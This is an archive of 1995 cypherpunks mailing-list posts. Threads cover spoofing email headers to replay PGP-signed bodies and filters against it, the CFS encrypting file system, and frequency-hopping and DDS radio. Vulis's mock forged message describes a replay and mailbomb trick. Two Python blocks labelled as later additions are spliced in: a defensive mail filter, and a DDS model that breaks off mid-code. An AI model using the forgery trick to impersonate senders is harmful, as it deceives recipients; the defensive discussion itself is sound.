Jonathan Blake <grafolog@netcom.com> writes:
> On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
>
> > As I keep pointing out, pgp-signing the body is not enough.
>
> 	You're wrong.

I'll be delighted if someone convinces me that I'm wrong about this.
I may even start using PGP signatures. :)

> 	You can set up Procmail to detect if something is signed
> 	with PGP, and if it is, to run a script which determines
> 	the authenticity of the signature.  If the signature is
> 	not authentic, the message goes to /dev/null.  That way,
> 	even if Carol is using intercepted messages from Bob, Carol's
> 	messages won't be accepted or seen.

Carol needn't put her real name in the "From:" line.  Much of the unsolicited
commercial junk e-mail comes from bogus addresses.

I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
came from Bob, and use the body from Bob's authentic PGP-signed message.

For example, Bob may have once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob
To: Carol
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@bob>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

"Ask not what your country can do to you, but what you can do to your country"

-----------------------------------------------------------------------

Carol can *easily* forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob
To: Alice
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bob>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

"Sex with Carol was the greatest sex I've ever had"

-----------------------------------------------------------------------

The e-mail is sent by Carol, but the RFC 822 header says "From: Bob".
If you think this is hard to accomplish, take a look, e.g., at the source
code of Lance Cottrell's mixmaster and see how it talks to sendmail.

The PGP-signed portion is copied verbatim from an authentic message.

Alice _may_ notice that the _Received:_ headers are weird, but this
forgery will certainly pass through a script that checks signatures.
E.g., this trick could be used to mailbomb someone with many copies
of the same authentic e-mail.

That's because PGP only signed a portion of the body, not the important
headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig.

Happy holidays,

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 02:20:32 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <X8BogD7w165w@bwalk.dm.com>
Message-ID: <199512251754.MAA01460@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:

| I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
| came from Bob, and use the body from Bob's authentic PGP-signed message.

	Yes, this is possible.  No, I'm not going to take the time to
write a fix now, but, we both know it's not tough to prevent.

	Take the hash of the pgp signed message, use it to filter on.
I'll occasionally add text outside a signature (literally, a
postscript), so filtering out everything outside the signed text is a
bad idea.  You might get a few spams, but not hundreds.  It's tough to
ensure that mail always has an envelope that matches the key.  I still
use a key that says adam@bwh.harvard.edu, but most of my mail is signed
with an adam@homeport.org key.

	Cryptography can't solve social problems.  It can, however,
transform them into tougher problems for the anti-social.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 02:28:37 +0800
To: grafolog@netcom.com (Jonathan Blake)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225091910.27577B-100000@netcom23>
Message-ID: <199512251804.NAA01482@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathan Blake wrote:

| > also need to make sure that there is ONLY PGP-signed content in the
| > mail.  Otherwise Mallet could grab an innocuous mail message that
[...]
| > I'm sure there's other caveats, these are just the ones I can think of now.
| 
| 	Let's figure out some more threat models.  And how to counter
| 	them.  
| 
| 	Man in the middle --- he has your public key, joe@none.net's
| 	public key, and access to both your public ring, and
| 	joe@none.net public ring.   I don't know how to counter
| 	this one using filters with perl --- yet.

	The real threat model that Dimitri seems to be worried about
is spammers, so let's address them.

There are two types of spammers, commercial and personal.

	The commercial spammer wants to get messages into hundreds or
thousands of mail boxes.  The effort to do this, per mailbox, needs to
be very low, or they go for people with worse filters.

	The personal spammer is more difficult, since they seek
specifically to annoy you, and can thus be expected to expend more
effort.  They can possibly get a copy of each signed message that
comes to you, but of course, you can cache filter them.  A problem
occurs if they can get their spam to you before the legit message, in
which case you need to wade through tripe to get to the real message.

	The personal spammer is a social problem, and I recommend
using social methods to fix it.  An auto-responder that says "Please
grow up" might do the trick.




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 26 Dec 1995 07:49:12 +0800
To: cypherpunks@toad.com
Subject: Encryption Discrimination from Sun
Message-ID: <199512252216.OAA09495@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was just browsing through the rules for the million dollar
contest just announced by Sun Microsystems to encourage the
writing of killer applets in Java, Sun's new architecture-
independent program format. 

The URL is http://javacontest.sun.com/rules/index.html in case
anyone is interested.

While reading the contest rules, I found the following one
particularly interesting...

   "No entries may include encryption as a feature
    or part of an applet."

This was made even more curious by the later revelation that
one of the criteria for judging entries was...

   "The applet should be able to transfer information from 
    one point to another, with no possibility of interception 
    or other interference during the process."

Doubtless the reason Sun nixed encryption is because this is an
international contest, and they did not want to deal with legal
hassles involving international borders and different laws in 
every country.    

Nonetheless, they seem to have missed an excellent opportunity
to encourage the migration of privacy software into the new 
realm they are creating. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 26 Dec 1995 04:06:04 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512251933.OAA14735@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


How about one-time electronic stamps. 
 
I generate a large-ish number of long-ish random numbers. 
 
I store these into a data base on my system. 
 
I send one e-stamp to all of the people I want to communicate with and vice
versa. 
 
Each person uses the e-stamp in the header or some other area of their
message to me easily accessible to my mail bot. 
 
My bot reads the e-stamp and then checks the data base to see if the stamp
is valid. 
 
If not, then /dev/null. If so, then: 
 
     a) send the message to me; 
     b) delete the used e-stamp from the data base; 
     c) send a confirmation of received message with a new e-stamp in it. 
 
Thoughts? (I see one problem with this but it should be able to be worked
out once the basic method is agreed to). 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 26 Dec 1995 04:16:04 +0800
To: alanh@infi.net
Subject: Re: bashing (fwd)
Message-ID: <9512251936.AA29575@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Allan, shut the hell up.
This thread is truly unnecessary, can we just let it die?

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 04:32:19 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251933.OAA14735@pipe8.nyc.pipeline.com>
Message-ID: <199512251953.OAA01614@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The basic problem is that (personal) spam is a social, not a
technical problem.  If someone wants to annoy you via the internet,
they can do so.  You can raise the cost of their annoying you, but you
need to be careful not to make it difficult to talk to you.

	Stamps are an annoying solution unless the stamp buys the
sender something that the sender wants (perhaps such as
pseudonymity).

	It would seem that only accepting signed mail, and caching the
hash of the signed part would work pretty well, and also not require
anything (other than a signature) from the remote end.  The cost of a
spam is the time to generate a new key pair.  (You probably need some
way to add new keys, for people to be able to say 'I'd like to talk to
you.')

Adam


| If not, then /dev/null. If so, then: 
|  
|      a) send the message to me; 
|      b) delete the used e-stamp from the data base; 
|      c) send a confirmation of received message with a new e-stamp in it. 
|  
| Thoughts? (I see one problem with this but it should be able to be worked
| out once the basic method is agreed to). 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
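
The checks proposed across this thread (pin the signer's key ID rather than the user name, divert mail that carries text outside the signed block, and cache a hash of the signed text for a week), combined in one filter. This is an added example, not code posted by anyone on the list; HMAC with constructed keys stands in for PGP verification so it runs offline, and every name in it (SignedMailFilter, toy_verify, the key IDs) is hypothetical.

```python
import hashlib
import hmac
import re
import time

WEEK = 7 * 24 * 3600

# Constructed toy keys. HMAC stands in for PGP so the example runs offline;
# a real filter would call PGP and read the signing key ID from its output.
TOY_KEYS = {"B0B00001": b"bob-secret", "CA201002": b"carol-secret"}

CLEARSIGNED = re.compile(
    r"-----BEGIN PGP SIGNED MESSAGE-----\n\n(?P<text>.*?)\n"
    r"-----BEGIN PGP SIGNATURE-----\n(?P<sig>.*?)\n"
    r"-----END PGP SIGNATURE-----\n?", re.S)


def toy_sign(key_id, text):
    mac = hmac.new(TOY_KEYS[key_id], text.encode(), hashlib.sha256).hexdigest()
    return f"{key_id}:{mac}"


def toy_verify(text, sig):
    """Return the signing key ID if the signature is valid, else None."""
    key_id, _, mac = sig.strip().partition(":")
    secret = TOY_KEYS.get(key_id)
    if secret is None:
        return None
    good = hmac.new(secret, text.encode(), hashlib.sha256).hexdigest()
    return key_id if hmac.compare_digest(mac.encode(), good.encode()) else None


def make_mail(headers, text, key_id, unsigned=""):
    """Build a constructed message: headers, optional unsigned text, signed block."""
    return (headers + "\n\n" + unsigned
            + "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + text
            + "\n-----BEGIN PGP SIGNATURE-----\n" + toy_sign(key_id, text)
            + "\n-----END PGP SIGNATURE-----\n")


class SignedMailFilter:
    def __init__(self, accepted_key_ids, verify, ttl=WEEK):
        self.accepted = set(accepted_key_ids)  # pinned key IDs, not user names
        self.verify = verify
        self.ttl = ttl
        self.seen = {}  # SHA-256 of signed text -> time it was first accepted

    def check(self, raw, now=None):
        now = time.time() if now is None else now
        _headers, _, body = raw.partition("\n\n")  # headers are unsigned: ignored
        blocks = list(CLEARSIGNED.finditer(body))
        if len(blocks) != 1:
            return "reject: need exactly one signed block"
        block = blocks[0]
        text = block.group("text")
        key_id = self.verify(text, block.group("sig"))
        if key_id is None:
            return "reject: bad signature"
        if key_id not in self.accepted:
            return "reject: key id not accepted"
        if (body[:block.start()] + body[block.end():]).strip():
            return "junk: unsigned text outside signed block"
        # Forget digests older than the retention window, then test for replay.
        self.seen = {d: t for d, t in self.seen.items() if now - t < self.ttl}
        digest = hashlib.sha256(text.encode()).hexdigest()
        if digest in self.seen:
            return "reject: replay of signed text"
        self.seen[digest] = now  # only accepted mail enters the cache
        return "accept"


def demo():
    """Run five constructed deliveries through Alice's filter, in order."""
    alice = SignedMailFilter({"B0B00001"}, toy_verify)
    hdr, note, t0 = "From: bob\nTo: alice\nSubject: %s", "Lunch on Thursday?", 1_000_000
    mails = [
        (make_mail(hdr % "lunch", note, "B0B00001"), t0),             # genuine
        (make_mail(hdr % "hello", note, "B0B00001"), t0 + 60),        # same text, new headers
        (make_mail(hdr % "offer", "Turnip ad", "CA201002"), t0 + 120),  # look-alike key
        (make_mail(hdr % "offer", "See you then.", "B0B00001",
                   unsigned="Turnip ad\n\n"), t0 + 180),              # ad above signed note
        (make_mail(hdr % "lunch", note, "B0B00001"), t0 + WEEK + 1),  # after cache expiry
    ]
    return [alice.check(raw, now=when) for raw, when in mails]


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```

The last delivery is accepted again because the one-week cache has forgotten the digest, so the retention window is the limit of the replay protection.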





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 26 Dec 1995 04:43:36 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512252009.PAA18246@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 25, 1995 14:53:19, 'Adam Shostack <adam@lighthouse.homeport.org>'
wrote: 
 
 
>	The basic problem is that (personal) spam is a social, not a 
>technical problem.  If someone wants to annoy you via the internet, 
>they can do so.  You can raise the cost of their annoying you, but you 
>need to be careful not to make it difficult to talk to you. 
> 
 
I agree in many ways. On a personal level, I am far more interested in the
*social* are of this form of privacy. It is more a problem of the
data-hermit than privacy. And in a society increasingly generating
narcissists, I see the problem getting worse.
 
Negroponte of the MIT Media Lab can sing the praises of the personal
e-newspaper with personal filters to cut out everything uninteresting while
culling the world news feeds for desired information.
 
I see this feeding into the narcissism problem. E.G.
 
Imagine two people who "feel" that members of the other gender are "only
interested in one thing." 
 
Each wakes up in the morning and looks at their personal e-paper. 
 
She reads nothing of particularly nasty rapes, serial rapists at large,
rapists who have been convicted, and rapists who an uncaring pro-male
system has let out to rape again (i.e. been found not guilty). 
 
He reads nothing of particularly nasty robberies of men by women, serial
robberies by prostitutes, female robbers who have been convicted, and
robbers who an uncaring pro-female system has let out to rob again. 
 
Both believe that their custom filtered feeds are the *real* events going
on in the world and are far more accurate than any non-customized news
feed. 
 
I hope nobody takes this as a generic attack on the privacy issues that the
list is devoted to. I am a great supporter of privacy and pro-privacy tek.
But I see myself as a realist on privacy issues, not as a privacy-utopian
or a privacy-dystopian. 
 
We live in a post-Faustian world. 
 
It is divided into two groups of people. First are those who understand the
post-Faustian character and devote themselves to getting used to it and
even having fun with the new opportunities while understanding that the new
world also generates new problems (like furthering data-narcissism). Second
are those classic-reactionary forces (from all parts of the political
spectrum) who whine about how the post-Faustian world is personally unfair
to them and how everybody in the world has a personal obligation to them to
move the world back to its pre-Faustian origins. 
 
--tallpaul 
 
PS to Tim May: I understand your posts on material that is off-topic. I
usually agree with your posts. But I see the issues I discussed above as
far more on topic (even if highly mediated) than, say, the ongoing
discourse on the differences between an Army Captain and a Navy Captain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 05:38:00 +0800
To: cypherpunks@toad.com
Subject: Future Scenarios for e$: The DCSB Forecast
Message-ID: <v02120d05ad04bfd9361e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

**************>>>>>>  Meeting Reminder: One week to go! <<<<<<***********
****>>>>>> Checks due to Shipwright *this* Saturday, December 30, 1995  <<<<<<**


                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                      Art Hutchinson and John Kelly
                Northeast Consulting Resources Inc., (NCRI)

             "Future Scenarios for e$: The DCSB Forecast"


                        Tuesday, January 2, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



I've been talking to Art Hutchinson last week, and it looks like we're in for a
treat.  This is going to be particularly useful, coming as it does at the
beginning of the new year. He and John Kelly are going to put our
prognostication skills through their paces with what amounts to a 90's version
of Delphi exercise, using us, a bunch of people who, if anyone, should have an
interesting take on where commerce on the internet is going in the next few
years. I'm psyched. Art and John are old pros at this kind of thing, so I expect
this is going to be great fun.

Since we're going to be doing something different besides listening to a speaker
this time, I'd like to suggest that we get there right at 12 noon to get
things started immediately, New Year's aldehyde toxicity notwithstanding.
;-).

Instead of one big group around a table, we'll be sitting at smaller tables with
a pile of future "events" to prognosticate about. Our opinions about the
likelihood about those events will be recorded by a "scribe" at each table, and
then posted for all to look at during/after lunch. The "events" are drawn from a
giant database of these things that NCRI has acquired over the years, filtered
down to e$-relevance, plus some suggestions from the stuff we've discussed on
the dcsb list and at monthly meetings.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by *this*
Saturday, December 30 , or you won't be on the list for lunch. We're trying to
hold the line on advance registration this time, because the holiday makes for
considerable uncertainty in reservations. I will be sending confirmations early
this time, on Thursday, just to make sure.  Checks payable to anyone else but
The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Committee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 26 Dec 1995 00:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: FH radios
In-Reply-To: <v01530512ad01d78bc507@[206.86.1.35]>
Message-ID: <30de2109.16381795@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote:

> Thus in a frequency-hopping radio you can push the retuning (read RF
> phase-locked loop) technology to its limit and build transmitters and
> receivers around them. These typically hop in the order of 100 times a
> second. The adversary has to find the uncorrelated signal very quickly
> indeed *and* have PLL technology at least as good as yours to recover
> anything from it. Finding the signal generally means listening to all
> frequencies at once, requiring huge amounts of hardware parallelism and/or
> realtime computing power. Once you throw ten or so radios onto the same
> band, it's no longer any use looking for the strongest signal, making that
> approach useless.

This is nowhere near the limit of the technology.  15 years ago, I was
working on PLLs that would stabilize within a couple degrees of final
phase within 3.5 microseconds.  That permits you to do useful work at
100,000 hops per second.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 26 Dec 1995 05:43:09 +0800
To: cypherpunks@toad.com
Subject: New release (v1.3.2) of CFS encrypting file system available
Message-ID: <199512252112.QAA07556@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Perhaps this isn't the best time for me to post this here; apologies
in advance if this sparks another flame fest.  -matt]

Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An improved key management scheme now allows changing the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES, MacGuffin, and SAFER-SK128 encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dxm@alpha.c2.org
Date: Tue, 26 Dec 1995 08:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: New Release of CFS
Message-ID: <199512260014.QAA08982@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:

> [Perhaps this isn't the best time for me to post this here; apologies
> in advance if this sparks another flame fest.  -matt]
>
> Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
> File System, is now available upon request for research and experimental
> use in the US and Canada.

Dear Mr. Blaze:

As you seem to have noticed, a few subscribers to cypherpunks are more
interested in exploring their own personal psychopathologies than in the
creation and spread of strong cryptography.  Please do not feel that you
need to apologize for their actions, and especially please do not restrict
your actions and/or posts because of them.

To correct merely one of the many mis-statements made by these people
desperate to draw attention to themselves, the Linux community is NOT
interested in 'out-of-the-box'.  If we were interested in 'out-of-the-
box', we would be running OSs that COME in a box.  What we ARE interested
in is source (or, if source isn't available, at least 128 bit keys).
If you provide source, we'll port it.  It's that simple.  While support
is nice, and appreciated, it is NOT NEEDED.  We can take care of ourselves.

So, on behalf of the Linux community and those of us running CFS, thank
you very much for your contribution.  And please don't let a couple of
idiots like these lower your opinion of the over 1 million Linux users
who appreciate your efforts and support.

--
Deus Ex Machina				dxm@alpha.c2.org
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Dec 1995 10:21:59 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251953.OAA01614@homeport.org>
Message-ID: <T6qogD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> 	It would seem that only accepting signed mail, and caching the
> hash of the signed part would work pretty well, and also not require

Keeping a hash of the signed part sounds like an excellent defense from the
attack of recycled messages. "Your mail blah blah is being returned to you
because it appears to be similar to the e-mail you sent on dd/mm/yy". Cool.

> anything (other than a signature) from the remote end.  The cost of a
> spam is the time to generate a new key pair.  (You probably need some
> way to add new keys, for people to be able to say 'I'd like to talk to
> you.')

When thinking of a protocol, it's useful to consider what we do in "real
life" to reach an important person: Either ask a common acquaintance to
introduce you, or go through a secretary.

Say, Alice wants to send e-mail to Bob who doesn't accept e-mail to strangers.
Alice may learn that Bob accepts Carol's e-mail, and ask Carol to forward
Alice's e-mail to Bob (with Carol's signature).

An interesting idea would be for Bob (together with other people) to pay some
David to screen their e-mail received from strangers (manually, or with the
help of some programs) and to decide whether to pass them on to Bob or to
discard it. E-mail from known senders goes straight to Bob, and e-mail from
strangers goes to David the screener. Not unlike "real life".

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 26 Dec 1995 06:55:52 +0800
To: lull@acm.org (John Lull)
Subject: Re: FH radios
In-Reply-To: <30de2109.16381795@smtp.ix.netcom.com>
Message-ID: <9512252206.AA10260@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote:
> 
> > Thus in a frequency-hopping radio you can push the retuning (read RF
> > phase-locked loop) technology to its limit and build transmitters and
> > receivers around them. These typically hop in the order of 100 times a
> > second. The adversary has to find the uncorrelated signal very quickly
> > indeed *and* have PLL technology at least as good as yours to recover
> > anything from it. Finding the signal generally means listening to all
> > frequencies at once, requiring huge amounts of hardware parallelism and/or
> > realtime computing power. Once you throw ten or so radios onto the same
> > band, it's no longer any use looking for the strongest signal, making that
> > approach useless.
> 
> This is nowhere near the limit of the technology.  15 years ago, I was
> working on PLLs that would stabilize within a couple degrees of final
> phase within 3.5 microseconds.  That permits you to do useful work at
> 100,000 hops per second.
> 
	There is also a newer technology called direct digital synthesis
or DDS that works by accumulating phase (adding to the previous value) 
each tick of a high frequency clock in a register at a rate determined
by the contents of another register (the value here sets the frequency)
with the upper bits of the accumulated phase being used to address a
sine/cosine lookup table rom which in turn feeds digital output values
into a D/A converter.  The output of the D/A converter is a sampled 
approximation of a sine or cosine wave at a frequency set by the
increment register.  The sample rate is set by the high frequency clock
rate.

	DDS permits instantaneous frequency shifts with phase continuous
output by simply reloading the phase increment register with another
value.  Unlike phase locked loop synthesizers there is no transient
phase and frequency error after a frequency shift.

	The primary limitation of DDS is set by the speed of the 
required digital hardware (and various subtler considerations such as
clock jitter and output filtering) - current VLSI implementations work
up to around 100 MHz with .1 Hz or better frequency resolution.

	And with a bit more sophistication the DDS principle can be used
to digitally generate vector modulation (BPSK, QPSK, QAM etc) and even
digitally filter the result with FIR filters to limit occupied
bandwidth.   There have even been some experiments with generating
broadcast FM stereo signals directly from digital music samples using
this technology.

	But to get back to the original point of this thread - while
such techniques are possible (as is full hard encryption), it is my
understanding that actual consumer 900 MHz digital cordless phones
that use frequency hopping use a very limited set of frequencies
and a small set of fixed hopping patterns and don't hop very fast. 

	There is certainly little additional cost to building a
truly secure digital cordless phone given the dense ASIC technology
that is standard in this kind of product - but someone has to
persuade the manufacturers that there is a real need and find a way
to allow them to export the product.

	When the brand of cordless phones that most emphasizes security
from eavesdropping in its point of sale advertising display is the one that
uses open FM with simple speech inversion you know there is something
wrong, particularly when the company that makes it is a pioneer in
really secure digital speech over handheld radios (and a big government
contractor).

						Dave Emery  N1PRE
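
The phase-accumulator scheme described in the message above, as an added Python model that is not part of the original post. The register widths (32-bit accumulator, 1024-entry sine ROM, 12-bit DAC), the 100 MHz clock and the hop schedule are assumptions chosen for illustration.

```python
import math


class DDS:
    """Phase-accumulator synthesizer: accumulator -> sine ROM -> DAC codes."""

    def __init__(self, clock_hz, acc_bits=32, lut_bits=10, dac_bits=12):
        self.clock_hz = clock_hz
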